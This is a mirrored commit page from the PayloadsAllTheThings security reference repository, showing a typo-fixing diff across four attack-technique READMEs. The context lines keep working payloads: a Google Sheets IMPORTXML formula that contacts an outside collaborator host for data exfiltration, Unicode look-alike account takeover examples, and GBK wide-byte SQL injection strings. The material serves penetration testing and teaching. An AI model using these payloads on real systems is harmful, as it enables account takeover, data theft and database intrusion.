Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2025-12-06 08:54:40 +01:00
Code Issues Projects Releases Wiki Activity

Merge pull request #787 from clemensGooooo/master

Browse source 
Fixed several typos
This commit is contained in:
Swissky 2025-07-29 19:09:56 +02:00 committed by GitHub
commit 178949896f
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
4 changed files with 8 additions and 8 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
Account Takeover/README.md
View file

@ -13,7 +13,7 @@
* [Leaking Password Reset Token](#leaking-password-reset-token) * [Leaking Password Reset Token](#leaking-password-reset-token)
* [Password Reset via Username Collision](#password-reset-via-username-collision) * [Password Reset via Username Collision](#password-reset-via-username-collision)
* [Account Takeover Due To Unicode Normalization Issue](#account-takeover-due-to-unicode-normalization-issue) * [Account Takeover Due To Unicode Normalization Issue](#account-takeover-due-to-unicode-normalization-issue)
* [Account Takeover via Web Vulneralities](#account-takeover-via-web-vulneralities) * [Account Takeover via Web Vulnerabilities](#account-takeover-via-web-vulnerabilities)
* [Account Takeover via Cross Site Scripting](#account-takeover-via-cross-site-scripting) * [Account Takeover via Cross Site Scripting](#account-takeover-via-cross-site-scripting)
* [Account Takeover via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling) * [Account Takeover via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling)
* [Account Takeover via CSRF](#account-takeover-via-csrf) * [Account Takeover via CSRF](#account-takeover-via-csrf)
@ -110,7 +110,7 @@ See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
### Account Takeover Due To Unicode Normalization Issue ### Account Takeover Due To Unicode Normalization Issue
When processing user input involving unicode for case mapping or normalisation, unexcepted behavior can occur. When processing user input involving unicode for case mapping or normalisation, unexpected behavior can occur.
* Victim account: `demo@gmail.com` * Victim account: `demo@gmail.com`
* Attacker account: `demⓞ@gmail.com` * Attacker account: `demⓞ@gmail.com`
@ -119,7 +119,7 @@ When processing user input involving unicode for case mapping or normalisation,
[Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform. [Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform.
## Account Takeover via Web Vulneralities ## Account Takeover via Web Vulnerabilities
### Account Takeover via Cross Site Scripting ### Account Takeover via Cross Site Scripting

4
CSV Injection/README.md
View file

@ -65,7 +65,7 @@ Technical details of the above payloads:
### Google Sheets ### Google Sheets
Google Sheets allows some additionnal formulas that are able to fetch remote URLs: Google Sheets allows some additional formulas that are able to fetch remote URLs:
* [IMPORTXML](https://support.google.com/docs/answer/3093342?hl=en)(url, xpath_query, locale) * [IMPORTXML](https://support.google.com/docs/answer/3093342?hl=en)(url, xpath_query, locale)
* [IMPORTRANGE](https://support.google.com/docs/answer/3093340)(spreadsheet_url, range_string) * [IMPORTRANGE](https://support.google.com/docs/answer/3093340)(spreadsheet_url, range_string)
@ -79,7 +79,7 @@ So one can test blind formula injection or a potential for data exfiltration wit
=IMPORTXML("http://burp.collaborator.net/csv", "//a/@href") =IMPORTXML("http://burp.collaborator.net/csv", "//a/@href")
``` ```
Note: an alert will warn the user a formula is trying to contact an external ressource and ask for authorization. Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization.
## References ## References

2
Insecure Randomness/README.md
View file

@ -188,7 +188,7 @@ Creating your own randomness algorithm is generally not recommended. Below are s
### Tools ### Tools
Generic identification and sandwitch attack: Generic identification and sandwich attack:
* [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Insecure time-based secret exploitation and Sandwich attack implementation Resources * [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Insecure time-based secret exploitation and Sandwich attack implementation Resources

4
SQL Injection/MySQL Injection.md
View file

@ -718,7 +718,7 @@ Wide byte injection is a specific type of SQL injection attack that targets appl
The `SET NAMES gbk` query can be exploited in a charset-based SQL injection attack. When the character set is set to GBK, certain multibyte characters can be used to bypass the escaping mechanism and inject malicious SQL code. The `SET NAMES gbk` query can be exploited in a charset-based SQL injection attack. When the character set is set to GBK, certain multibyte characters can be used to bypass the escaping mechanism and inject malicious SQL code.
Several characters can be used to triger the injection. Several characters can be used to trigger the injection.
* `%bf%27`: This is a URL-encoded representation of the byte sequence `0xbf27`. In the GBK character set, `0xbf27` decodes to a valid multibyte character followed by a single quote ('). When MySQL encounters this sequence, it interprets it as a single valid GBK character followed by a single quote, effectively ending the string. * `%bf%27`: This is a URL-encoded representation of the byte sequence `0xbf27`. In the GBK character set, `0xbf27` decodes to a valid multibyte character followed by a single quote ('). When MySQL encounters this sequence, it interprets it as a single valid GBK character followed by a single quote, effectively ending the string.
* `%bf%5c`: Represents the byte sequence `0xbf5c`. In GBK, this decodes to a valid multi-byte character followed by a backslash (`\`). This can be used to escape the next character in the sequence. * `%bf%5c`: Represents the byte sequence `0xbf5c`. In GBK, this decodes to a valid multi-byte character followed by a backslash (`\`). This can be used to escape the next character in the sequence.
@ -756,7 +756,7 @@ For instance, if the input is `?id=1'`, PHP will add a backslash, resulting in t
However, when the sequence `%df` is introduced before the single quote, as in `?id=1%df'`, PHP still adds the backslash. This results in the SQL query: `SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1`. However, when the sequence `%df` is introduced before the single quote, as in `?id=1%df'`, PHP still adds the backslash. This results in the SQL query: `SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1`.
In the GBK character set, the sequence `%df%5c` translates to the character `連`. So, the SQL query becomes: `SELECT * FROM users WHERE id='1連'' LIMIT 0,1`. Here, the wide byte character `連` effectively "eating" the added escape charactr, allowing for SQL injection. In the GBK character set, the sequence `%df%5c` translates to the character `連`. So, the SQL query becomes: `SELECT * FROM users WHERE id='1連'' LIMIT 0,1`. Here, the wide byte character `連` effectively "eating" the added escape character, allowing for SQL injection.
Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the backslash, the SQL query transforms into: `SELECT * FROM users WHERE id='1連' and 1=1 --+' LIMIT 0,1`. This altered query can be successfully injected, bypassing the intended SQL logic. Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the backslash, the SQL query transforms into: `SELECT * FROM users WHERE id='1連' and 1=1 --+' LIMIT 0,1`. This altered query can be successfully injected, bypassing the intended SQL logic.